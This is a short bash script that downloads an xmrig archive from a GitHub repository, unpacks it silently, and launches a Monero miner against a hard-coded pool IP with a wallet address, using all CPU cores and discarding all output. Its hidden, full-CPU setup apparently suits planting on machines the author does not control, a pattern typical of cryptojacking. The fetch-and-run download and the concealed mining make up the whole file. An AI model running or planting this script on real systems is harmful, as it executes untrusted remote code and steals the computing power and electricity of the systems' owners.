#!/bin/bash
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz >/dev/null 2>&1
./xmrig --donate-level 1 -o 178.128.95.152:443 -u solo:SaLvsBJ5F8YNDADbogTbhYHLty1scae4niLeRX91ftwtZaaMxikgH3jMHq276Wi3zfU3MGgC13Bx5FrdW4P5mHQQMewpPBvEHDU -p gln -a rx/0 -t $(nproc --all) >/dev/null 2>&1
